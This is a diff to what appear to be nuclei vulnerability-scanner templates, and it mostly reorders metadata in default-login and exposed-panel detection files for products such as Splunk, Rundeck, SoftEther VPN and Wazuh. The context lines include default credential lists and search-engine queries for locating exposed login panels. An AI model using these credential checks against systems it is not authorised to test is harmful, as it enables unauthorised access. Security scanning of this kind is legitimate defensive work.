4a0a00473045022100ced4e051d16f58cbefe47b2e6d4acfb6f917418ea7694c5248d757815146178f02200e8ff5e2a45e4224bf56d9e4d5a2bb7ec6ea6c15cbf45fcdaf10431d404c9481:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/others/inspur-clusterengine-default-login.yaml b/http/default-logins/others/inspur-clusterengine-default-login.yaml index 5cf5cb1119..e3290640f3 100644 --- a/http/default-logins/others/inspur-clusterengine-default-login.yaml +++ b/http/default-logins/others/inspur-clusterengine-default-login.yaml @@ -7,15 +7,15 @@ info: description: Inspur Clusterengine version 4 default admin login credentials were successful. reference: - https://blog.csdn.net/qq_36197704/article/details/115665793 - metadata: - max-request: 1 - fofa-query: title="TSCEV4.0" - product: clusterengine - vendor: inspur - tags: default-login,inspur,clusterengine - classification: cpe: cpe:2.3:a:inspur:clusterengine:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: inspur + product: clusterengine + fofa-query: title="TSCEV4.0" + tags: default-login,inspur,clusterengine + http: - raw: - | @@ -50,4 +50,4 @@ http: status: - 200 -# digest: 4a0a0047304502205a0a7bfae8326d478cff4165b5e1b4ada8d48f6b796c9e9cb65310a6c673bc1b022100ec27eaa708bfd5944f619c4d517ba9b77f0064eff47c13c95da156b9477c7057:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205a0a7bfae8326d478cff4165b5e1b4ada8d48f6b796c9e9cb65310a6c673bc1b022100ec27eaa708bfd5944f619c4d517ba9b77f0064eff47c13c95da156b9477c7057:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/powerjob-default-login.yaml b/http/default-logins/powerjob-default-login.yaml index 6f7c724da7..eac1eb6a7d 100644 --- a/http/default-logins/powerjob-default-login.yaml +++ b/http/default-logins/powerjob-default-login.yaml @@ -8,17 +8,17 @@ info: PowerJob default login credentials were discovered. reference: - https://www.yuque.com/powerjob/guidence/trial + classification: + cpe: cpe:2.3:a:powerjob:powerjob:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: powerjob + product: powerjob shodan-query: http.title:"PowerJob" fofa-query: title="PowerJob" - product: powerjob - vendor: powerjob tags: powerjob,default-login - classification: - cpe: cpe:2.3:a:powerjob:powerjob:*:*:*:*:*:*:*:* http: - raw: - | @@ -51,4 +51,4 @@ http: status: - 200 -# digest: 4a0a00473045022100e0932bdfd3f0a186246164ab3130657f786b2085855c379a04ccfd23d996367d022008983aba06ca46d52608bddcdb44d48584b3570603c384713bdace7b95effb50:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e0932bdfd3f0a186246164ab3130657f786b2085855c379a04ccfd23d996367d022008983aba06ca46d52608bddcdb44d48584b3570603c384713bdace7b95effb50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/pyload/pyload-default-login.yaml b/http/default-logins/pyload/pyload-default-login.yaml index c6681d6b8a..f0b01c37f7 100644 --- a/http/default-logins/pyload/pyload-default-login.yaml +++ b/http/default-logins/pyload/pyload-default-login.yaml @@ -8,16 +8,16 @@ info: PyLoad Default Credentials were discovered. reference: - https://pypi.org/project/pyload-ng/#:~:text=Default%20username%3A%20pyload%20.,Default%20password%3A%20pyload%20. + classification: + cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"pyload" - product: pyload vendor: pyload + product: pyload + shodan-query: html:"pyload" tags: default-login,pyload - classification: - cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:* http: - raw: - | @@ -47,4 +47,4 @@ http: status: - 302 -# digest: 4b0a00483046022100887e6f5542621f9fd95a3e282c0a2de60e2fe8e1e0fc0fcbe1dd257885cb5d63022100a040e0e40efa61edc561c8aa3f0a00637973247e99c02bf2eef6d4d6a7aadbbc:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100887e6f5542621f9fd95a3e282c0a2de60e2fe8e1e0fc0fcbe1dd257885cb5d63022100a040e0e40efa61edc561c8aa3f0a00637973247e99c02bf2eef6d4d6a7aadbbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/rainloop/rainloop-default-login.yaml b/http/default-logins/rainloop/rainloop-default-login.yaml index aeda740ba2..b3495dbeee 100644 --- a/http/default-logins/rainloop/rainloop-default-login.yaml +++ b/http/default-logins/rainloop/rainloop-default-login.yaml @@ -7,16 +7,16 @@ info: description: Rainloop WebMail default admin login credentials were successful. reference: - https://github.com/RainLoop/rainloop-webmail/issues/28 + classification: + cpe: cpe:2.3:a:rainloop:webmail:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - fofa-query: app="RAINLOOP-WebMail" - product: webmail vendor: rainloop + product: webmail + fofa-query: app="RAINLOOP-WebMail" tags: default-login,rainloop,webmail,foss - classification: - cpe: cpe:2.3:a:rainloop:webmail:*:*:*:*:*:*:*:* http: - raw: - | @@ -28,6 +28,7 @@ http: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Login={{user}}&Password={{pass}}&Action=AdminLogin&XToken={{token}} + attack: pitchfork payloads: user: @@ -55,4 +56,4 @@ http: status: - 200 -# digest: 490a00463044022011d2ae91eff5020e269da659009bc07fbb88ab0ed413d851cef53af4fcbeb62902201e8b6d2a4e63b738161bf55d2099768df041004f0d36635923d28f1b70752a8b:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022011d2ae91eff5020e269da659009bc07fbb88ab0ed413d851cef53af4fcbeb62902201e8b6d2a4e63b738161bf55d2099768df041004f0d36635923d28f1b70752a8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/rconfig-default-login.yaml b/http/default-logins/rconfig-default-login.yaml index 0054a5e753..254bbac8b7 100644 --- a/http/default-logins/rconfig-default-login.yaml +++ b/http/default-logins/rconfig-default-login.yaml @@ -8,16 +8,16 @@ info: rConfig contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. reference: - https://github.com/rconfig/rconfig + classification: + cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: http.title:"rConfig" - product: rconfig vendor: rconfig + product: rconfig + shodan-query: http.title:"rConfig" tags: rconfig,default-login - classification: - cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* http: - raw: - | @@ -58,4 +58,4 @@ http: status: - 200 -# digest: 490a0046304402200b64a3d2c28156acb0f4d1497199fce906e807ca0afd3d5fcc6b504f04d233da022023da45f54e216f07870e9ffdbe57b77a1e87d9ce512a9033b6920f22e10bfa3e:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200b64a3d2c28156acb0f4d1497199fce906e807ca0afd3d5fcc6b504f04d233da022023da45f54e216f07870e9ffdbe57b77a1e87d9ce512a9033b6920f22e10bfa3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/riello/netman-default-login.yaml b/http/default-logins/riello/netman-default-login.yaml index d93517ca21..c77534ebc0 100644 --- a/http/default-logins/riello/netman-default-login.yaml +++ b/http/default-logins/riello/netman-default-login.yaml @@ -8,17 +8,17 @@ info: Default logins on Riello UPS NetMan 204 is used. Attacker can access to UPS and attacker can manipulate the UPS settings to disrupt the onsite systems. reference: - https://www.riello-ups.com/ + classification: + cpe: cpe:2.3:o:riello-ups:netman_204_firmware:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 + vendor: riello-ups + product: netman_204_firmware shodan-query: title:"Netman" censys-query: services.http.response.body:"Netman204" - product: netman_204_firmware - vendor: riello-ups tags: default-login,netman - classification: - cpe: cpe:2.3:o:riello-ups:netman_204_firmware:*:*:*:*:*:*:*:* http: - raw: - | @@ -45,4 +45,4 @@ http: status: - 200 -# digest: 4b0a00483046022100b566c3a1c77531131974bb1d1f4553f3a7a5e951c5918b21804652c643d32458022100aebdf668f07c2333d3a72dd90ea0575c484463d64a21c8791477f80269b1f235:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b566c3a1c77531131974bb1d1f4553f3a7a5e951c5918b21804652c643d32458022100aebdf668f07c2333d3a72dd90ea0575c484463d64a21c8791477f80269b1f235:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/rundeck/rundeck-default-login.yaml b/http/default-logins/rundeck/rundeck-default-login.yaml index 08049adb07..8c0ccb9181 100644 --- a/http/default-logins/rundeck/rundeck-default-login.yaml +++ b/http/default-logins/rundeck/rundeck-default-login.yaml @@ -9,16 +9,15 @@ info: reference: - https://raw.githubusercontent.com/karkis3c/bugbounty/main/nuclei-templates/default-login/rundeck-default-login.yaml - https://docs.rundeck.com/docs/learning/ + classification: + cpe: cpe:2.3:a:pagerduty:rundeck:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - fofa-query: app="Rundeck-Login" - product: rundeck vendor: pagerduty + product: rundeck + fofa-query: app="Rundeck-Login" tags: default-login,rundeck - - classification: - cpe: cpe:2.3:a:pagerduty:rundeck:*:*:*:*:*:*:*:* variables: username: admin password: admin @@ -31,7 +30,6 @@ http: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 j_username={{username}}&j_password={{password}} - - | GET /menu/home HTTP/1.1 Host: {{Hostname}} @@ -48,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fef40e31264843e21f89a843ba6f31f4109ca0016824152fbaf590c8371c9cc5022076659b8514e4eba7270ea5232d9f8545423a000bdf1274b7fc95aa9caa0cb968:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100fef40e31264843e21f89a843ba6f31f4109ca0016824152fbaf590c8371c9cc5022076659b8514e4eba7270ea5232d9f8545423a000bdf1274b7fc95aa9caa0cb968:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/softether/softether-vpn-default-login.yaml b/http/default-logins/softether/softether-vpn-default-login.yaml index 98c86b3cc0..e78bffa949 100644 --- a/http/default-logins/softether/softether-vpn-default-login.yaml +++ b/http/default-logins/softether/softether-vpn-default-login.yaml @@ -8,16 +8,16 @@ info: The administrative password for the SoftEther VPN Server is blank. reference: - https://www.softether.org/4-docs/1-manual/3._SoftEther_VPN_Server_Manual/3.3_VPN_Server_Administration#Administration_Authority_for_the_Entire_SoftEther_VPN_Server + classification: + cpe: cpe:2.3:a:softether:vpn:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"SoftEther VPN Server" - product: vpn vendor: softether + product: vpn + shodan-query: title:"SoftEther VPN Server" tags: misconfig,vpn,softether,default-login - classification: - cpe: cpe:2.3:a:softether:vpn:*:*:*:*:*:*:*:* http: - raw: - | @@ -30,7 +30,7 @@ http: username: - administrator password: - - + - null matchers-condition: and matchers: @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402205c1ef0dce69c50da55acaa53406c82710813d759723176e6ef4e4fee858b7bca02200b895a7367f4e624433a856e0dbf9d38de950d2d115ca5c5527c82ad81ba5394:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402205c1ef0dce69c50da55acaa53406c82710813d759723176e6ef4e4fee858b7bca02200b895a7367f4e624433a856e0dbf9d38de950d2d115ca5c5527c82ad81ba5394:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/splunk/splunk-default-login.yaml b/http/default-logins/splunk/splunk-default-login.yaml index a25fe918ac..557122149b 100644 --- a/http/default-logins/splunk/splunk-default-login.yaml +++ b/http/default-logins/splunk/splunk-default-login.yaml @@ -6,16 +6,16 @@ info: severity: high description: | Splunk Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security. + classification: + cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:* metadata: verified: true max-request: 9 - shodan-query: http.title:"Splunk" - product: splunk vendor: splunk + product: splunk + shodan-query: http.title:"Splunk" tags: default-login,splunk - classification: - cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:* http: - raw: - | @@ -47,9 +47,9 @@ http: - "admin" - "splunk" - "toor" - stop-at-first-match: true host-redirects: true + matchers-condition: and matchers: - type: word @@ -70,4 +70,5 @@ http: part: header regex: - 'cval=([0-9]+)' -# digest: 4b0a00483046022100ce91d4b9bd6a78ad0f1da61f3e9222cdb9db0f17bd4baa08ad302f1a57013161022100f2a44470cac093eedcba91b9a41d16f1c1141f063824121f54ebe9568bfab88f:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100ce91d4b9bd6a78ad0f1da61f3e9222cdb9db0f17bd4baa08ad302f1a57013161022100f2a44470cac093eedcba91b9a41d16f1c1141f063824121f54ebe9568bfab88f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/wazuh-default-login.yaml b/http/default-logins/wazuh-default-login.yaml index 14cf15ea05..018a68af89 100644 --- a/http/default-logins/wazuh-default-login.yaml +++ b/http/default-logins/wazuh-default-login.yaml @@ -10,16 +10,16 @@ info: - https://documentation.wazuh.com/current/user-manual/user-administration/password-management.html - https://wazuh.com - https://documentation.wazuh.com/current/deployment-options/docker/wazuh-container.html#single-node-deployment + classification: + cpe: cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:* metadata: verified: true max-request: 7 - shodan-query: "title:\"Wazuh\"" - product: wazuh vendor: wazuh + product: wazuh + shodan-query: "title:\"Wazuh\"" tags: wazuh,default-login - classification: - cpe: cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:* http: - method: GET path: @@ -73,4 +73,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009455b6beb3dd3660a1acfbfb547e2a94b8160fcbf9501c51f246568d7d26b21702204c46b154f7b28cad6aa4a6fc66515aff039e95ba59642d2b70729598de351bdb:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450221009455b6beb3dd3660a1acfbfb547e2a94b8160fcbf9501c51f246568d7d26b21702204c46b154f7b28cad6aa4a6fc66515aff039e95ba59642d2b70729598de351bdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/acti-panel.yaml b/http/exposed-panels/acti-panel.yaml index 7243bf1045..75e678aa1d 100644 --- a/http/exposed-panels/acti-panel.yaml +++ b/http/exposed-panels/acti-panel.yaml @@ -4,17 +4,17 @@ info: name: ACTi Video Monitoring Panel - Detection author: DhiyaneshDk severity: info + classification: + cpe: cpe:2.3:o:acti:camera_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: acti + product: camera_firmware shodan-query: title:"Web Configurator" html:"ACTi" fofa-query: app="ACTi-视频监控" - product: camera_firmware - vendor: acti tags: acti,panel,login,detect - classification: - cpe: cpe:2.3:o:acti:camera_firmware:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +32,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402202ff45925f682afb5561ce24b6edb6a297d24f4b8bb8e68ddaa8f74ebb6bdf51202201064bc5389f172c1cce1197e8715c77af9f209193cc6b3a7b4f0965cb0183303:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402202ff45925f682afb5561ce24b6edb6a297d24f4b8bb8e68ddaa8f74ebb6bdf51202201064bc5389f172c1cce1197e8715c77af9f209193cc6b3a7b4f0965cb0183303:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adguard-panel.yaml b/http/exposed-panels/adguard-panel.yaml index f228123337..a5ac6685ce 100644 --- a/http/exposed-panels/adguard-panel.yaml +++ b/http/exposed-panels/adguard-panel.yaml @@ -6,16 +6,16 @@ info: severity: info description: | AdGuard panel has been detected. - metadata: - max-request: 1 - verified: true - fofa-query: title="AdGuard Home" - product: adguard - vendor: adguard - tags: adguard,panel,login,detect - classification: cpe: cpe:2.3:a:adguard:adguard:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: adguard + product: adguard + fofa-query: title="AdGuard Home" + tags: adguard,panel,login,detect + http: - method: GET path: @@ -34,4 +34,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220730adc9fcdcc4df45177d9cfab02b37df33d1945732441c4dac5811faf288eb902206f66cb45c1b423bfe9a4e9511d534b50f575855c1f5c26bf533e3a81db6fe63c:922c64590222798bb761d5b6d8e72950 + +# digest: 490a004630440220730adc9fcdcc4df45177d9cfab02b37df33d1945732441c4dac5811faf288eb902206f66cb45c1b423bfe9a4e9511d534b50f575855c1f5c26bf533e3a81db6fe63c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/airos-panel.yaml b/http/exposed-panels/airos-panel.yaml index 37e1b75251..e6350fafbb 100644 --- a/http/exposed-panels/airos-panel.yaml +++ b/http/exposed-panels/airos-panel.yaml @@ -6,16 +6,16 @@ info: severity: info description: | AirOS panel was detected. + classification: + cpe: cpe:2.3:o:ui:airos:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: "http.favicon.hash:-697231354" - product: airos vendor: ui + product: airos + shodan-query: "http.favicon.hash:-697231354" tags: airos,panel - classification: - cpe: cpe:2.3:o:ui:airos:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +31,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022029f1587f6c760a398c179915decdd1c6f7492d915a4cda673ba9be590756dc5802207e0d46fae9185acbfe36d2c9bea4822152a5ea03b718f73fd56f17bf2d7ec4c5:922c64590222798bb761d5b6d8e72950 + +# digest: 490a00463044022029f1587f6c760a398c179915decdd1c6f7492d915a4cda673ba9be590756dc5802207e0d46fae9185acbfe36d2c9bea4822152a5ea03b718f73fd56f17bf2d7ec4c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/apache/apache-apollo-panel.yaml b/http/exposed-panels/apache/apache-apollo-panel.yaml index cf0cb9a6a1..3d237a2b9f 100644 --- a/http/exposed-panels/apache/apache-apollo-panel.yaml +++ b/http/exposed-panels/apache/apache-apollo-panel.yaml @@ -4,16 +4,16 @@ info: name: Apache Apollo Panel - Detect author: ritikchaddha severity: info + classification: + cpe: cpe:2.3:a:apache:activemq_apollo:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Apache Apollo" - product: activemq_apollo vendor: apache + product: activemq_apollo + shodan-query: title:"Apache Apollo" tags: panel,apache,apollo,login,detect - classification: - cpe: cpe:2.3:a:apache:activemq_apollo:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +29,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210091d96867344b35c42563552bc564b4182466d6cac4abee2d338984b6e1cdd7d6022074f11714cb13bb709904658251bcccfdc4edba265448bd850d731a800f148d77:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502210091d96867344b35c42563552bc564b4182466d6cac4abee2d338984b6e1cdd7d6022074f11714cb13bb709904658251bcccfdc4edba265448bd850d731a800f148d77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/aspcms-backend-panel.yaml b/http/exposed-panels/aspcms-backend-panel.yaml index cdcff7340f..ad5adcd7ff 100644 --- a/http/exposed-panels/aspcms-backend-panel.yaml +++ b/http/exposed-panels/aspcms-backend-panel.yaml @@ -8,16 +8,16 @@ info: ASPcms /plug/oem/AspCms_OEMFun.asp leak backend url. reference: - https://github.com/GREENHAT7/pxplan/blob/main/goby_pocs/Aspcms_Backend_Leak.json + classification: + cpe: cpe:2.3:a:asp4cms:aspcms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - fofa-query: app="ASPCMS" - product: aspcms vendor: asp4cms + product: aspcms + fofa-query: app="ASPCMS" tags: panel,login,aspcms,admin - classification: - cpe: cpe:2.3:a:asp4cms:aspcms:*:*:*:*:*:*:*:* http: - raw: - | @@ -40,4 +40,5 @@ http: - 'status_code_1 == 200 && contains(body_1,"alert(")' - 'status_code_2 == 200 && contains(body_2,"var txtUserName = document.getElementById(")' condition: and -# digest: 490a004630440220234479820f4cc17b655263c9954725359c7d3dcb06092d722a81fa09cc027c2d02204e2d96c6500cad3ed9161ad8d9b391630442e9f68ac7cc0dfc0332a2c71de186:922c64590222798bb761d5b6d8e72950 + +# digest: 490a004630440220234479820f4cc17b655263c9954725359c7d3dcb06092d722a81fa09cc027c2d02204e2d96c6500cad3ed9161ad8d9b391630442e9f68ac7cc0dfc0332a2c71de186:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/atlassian-bamboo-panel.yaml b/http/exposed-panels/atlassian-bamboo-panel.yaml index 49b1e6ec8c..90223cc938 100644 --- a/http/exposed-panels/atlassian-bamboo-panel.yaml +++ b/http/exposed-panels/atlassian-bamboo-panel.yaml @@ -8,16 +8,16 @@ info: Atlassian Bamboo login panel was detected. reference: - https://www.atlassian.com/software/bamboo + classification: + cpe: cpe:2.3:a:atlassian:bamboo:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"Bamboo" - product: bamboo vendor: atlassian + product: bamboo + shodan-query: http.title:"Bamboo" tags: panel,bamboo,login,detect - classification: - cpe: cpe:2.3:a:atlassian:bamboo:*:*:*:*:*:*:*:* http: - method: GET path: @@ -45,4 +45,5 @@ http: regex: - 'version\s+([0-9A-Za-z\s\.]+)\s+-' - 'pvpVersion = "([a-z0-9.]+)";' -# digest: 490a00463044022077379f6cb3ccaffdd11f65581956ef6b17ad1721484cb296df66e78d4c9948af022046cc1693337f88f3eff468bb4785c6cc8065c3633a1edf960d6310d6620862c7:922c64590222798bb761d5b6d8e72950 + +# digest: 490a00463044022077379f6cb3ccaffdd11f65581956ef6b17ad1721484cb296df66e78d4c9948af022046cc1693337f88f3eff468bb4785c6cc8065c3633a1edf960d6310d6620862c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/audiobookshelf-panel.yaml b/http/exposed-panels/audiobookshelf-panel.yaml index 4c160d519e..409be5527f 100644 --- a/http/exposed-panels/audiobookshelf-panel.yaml +++ b/http/exposed-panels/audiobookshelf-panel.yaml @@ -6,6 +6,8 @@ info: severity: info reference: - https://github.com/advplyr/audiobookshelf + classification: + cpe: cpe:2.3:a:audiobookshelf:audiobookshelf:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 @@ -14,8 +16,6 @@ info: vendor: audiobookshelf tags: panel,audiobookshelf,detect - classification: - cpe: cpe:2.3:a:audiobookshelf:audiobookshelf:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/exposed-panels/authelia-panel.yaml b/http/exposed-panels/authelia-panel.yaml index 78e4b5fe04..a0412ddf79 100644 --- a/http/exposed-panels/authelia-panel.yaml +++ b/http/exposed-panels/authelia-panel.yaml @@ -9,16 +9,16 @@ info: reference: - https://github.com/authelia/authelia - https://www.authelia.com/ + classification: + cpe: cpe:2.3:a:authelia:authelia:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Login - Authelia" - product: authelia vendor: authelia + product: authelia + shodan-query: title:"Login - Authelia" tags: login,panel,authelia - classification: - cpe: cpe:2.3:a:authelia:authelia:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022011c652c8e4ad3e46de531e029c3bcd7fe019a1f7ef8a71aa7ef87b3d039c60d4022034538df50b7e165e8d36b3bbcb858d44a935fa2bc1592669221f17de9e1f0b50:922c64590222798bb761d5b6d8e72950 + +# digest: 490a00463044022011c652c8e4ad3e46de531e029c3bcd7fe019a1f7ef8a71aa7ef87b3d039c60d4022034538df50b7e165e8d36b3bbcb858d44a935fa2bc1592669221f17de9e1f0b50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/beyondtrust-priv-panel.yaml b/http/exposed-panels/beyondtrust-priv-panel.yaml index dffcf04241..a846296e29 100644 --- a/http/exposed-panels/beyondtrust-priv-panel.yaml +++ b/http/exposed-panels/beyondtrust-priv-panel.yaml @@ -8,16 +8,16 @@ info: BeyondTrust Privileged Remote Access login panel was detected. reference: - https://www.beyondtrust.com/products/privileged-remote-access + classification: + cpe: cpe:2.3:a:beyondtrust:privileged_remote_access:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: "http.html:\"BeyondTrust Privileged Remote Access Login\"" - product: privileged_remote_access vendor: beyondtrust + product: privileged_remote_access + shodan-query: "http.html:\"BeyondTrust Privileged Remote Access Login\"" tags: panel,beyondtrust,login,detect - classification: - cpe: cpe:2.3:a:beyondtrust:privileged_remote_access:*:*:*:*:*:*:*:* http: - method: GET path: @@ -25,11 +25,11 @@ http: - "{{BaseURL}}/login/pre_login_agreement" stop-at-first-match: true - matchers: - type: dsl dsl: - 'status_code == 200' - 'contains_any(to_lower(body), "beyondtrust privileged remote access login", "privileged-remote-access") && contains(to_lower(body), "login")' condition: and -# digest: 490a00463044022028b4e01a5b67ca4c729f2f8622b5c4d5f37790ab986c7391d5d051b04c4f6f68022050105cc6f641dcc0a83e084ff5079d19f2afc6602415776f329ed7cb90fb8192:922c64590222798bb761d5b6d8e72950 + +# digest: 490a00463044022028b4e01a5b67ca4c729f2f8622b5c4d5f37790ab986c7391d5d051b04c4f6f68022050105cc6f641dcc0a83e084ff5079d19f2afc6602415776f329ed7cb90fb8192:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bonobo-server-panel.yaml b/http/exposed-panels/bonobo-server-panel.yaml index 6a65031aa9..de2e5a21aa 100644 --- a/http/exposed-panels/bonobo-server-panel.yaml +++ b/http/exposed-panels/bonobo-server-panel.yaml @@ -6,16 +6,16 @@ info: severity: info description: | Bonobo Git Server login panel was detected. + classification: + cpe: cpe:2.3:a:bonobogitserver:bonobo_git_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: http.favicon.hash:-219625874 - product: bonobo_git_server vendor: bonobogitserver + product: bonobo_git_server + shodan-query: http.favicon.hash:-219625874 tags: panel,bonobo,git,login,detect - classification: - cpe: cpe:2.3:a:bonobogitserver:bonobo_git_server:*:*:*:*:*:*:*:* http: - method: GET path: @@ -24,8 +24,8 @@ http: host-redirects: true max-redirects: 2 - stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -42,4 +42,5 @@ http: group: 1 regex: - '(?i)bonobo git server \((.*)\)' -# digest: 4a0a00473045022018f4fb6f144e0c0797a0dbd56483a50d32639f079141a0ff0928451deb1f45600221008ee83aa47cad2848439cf9632a05c14c34ba0bb36afd80a31809ce7cbb5f638f:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022018f4fb6f144e0c0797a0dbd56483a50d32639f079141a0ff0928451deb1f45600221008ee83aa47cad2848439cf9632a05c14c34ba0bb36afd80a31809ce7cbb5f638f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/busybox-repository-browser.yaml b/http/exposed-panels/busybox-repository-browser.yaml index 6a39dad0f2..3f161fca02 100644 --- a/http/exposed-panels/busybox-repository-browser.yaml +++ b/http/exposed-panels/busybox-repository-browser.yaml @@ -8,16 +8,16 @@ info: Busybox Repository Browser was detected. reference: - https://github.com/mirror/busybox + classification: + cpe: cpe:2.3:a:busybox:busybox:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: title="Busybox Repository Browser" - product: busybox vendor: busybox + product: busybox + fofa-query: title="Busybox Repository Browser" tags: detect,busybox,oss,panel - classification: - cpe: cpe:2.3:a:busybox:busybox:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d6a1f10acac0f712eb8ee9719f6f081cc8e937cb4f32885c4dc5f71a78282cd2022100cb07961a60db5dfb12cd6497f3e120d56f7d3646c283ebde7f883d4b9efe9b0f:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100d6a1f10acac0f712eb8ee9719f6f081cc8e937cb4f32885c4dc5f71a78282cd2022100cb07961a60db5dfb12cd6497f3e120d56f7d3646c283ebde7f883d4b9efe9b0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/caldera-c2.yaml b/http/exposed-panels/c2/caldera-c2.yaml index 62b2500796..d99ee91f03 100644 --- a/http/exposed-panels/c2/caldera-c2.yaml +++ b/http/exposed-panels/c2/caldera-c2.yaml @@ -9,16 +9,16 @@ info: reference: - https://github.com/mitre/caldera - https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py + classification: + cpe: cpe:2.3:a:mitre:caldera:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: http.favicon.hash:-636718605 - product: caldera vendor: mitre + product: caldera + fofa-query: http.favicon.hash:-636718605 tags: c2,ir,osint,caldera,panel - classification: - cpe: cpe:2.3:a:mitre:caldera:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +34,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202ed3136e5c5f63eab633746afb7d795c109d100fadcb51118322c2daf931a791022100a444d8fffaa58aa50a471e4dd3568c359d6f3dbcfa5ac74879ca34b2fbc6c71b:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502202ed3136e5c5f63eab633746afb7d795c109d100fadcb51118322c2daf931a791022100a444d8fffaa58aa50a471e4dd3568c359d6f3dbcfa5ac74879ca34b2fbc6c71b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/changedetection-panel.yaml b/http/exposed-panels/changedetection-panel.yaml index e254f7c93c..d1d74ac944 100644 --- a/http/exposed-panels/changedetection-panel.yaml +++ b/http/exposed-panels/changedetection-panel.yaml @@ -9,16 +9,16 @@ info: reference: - 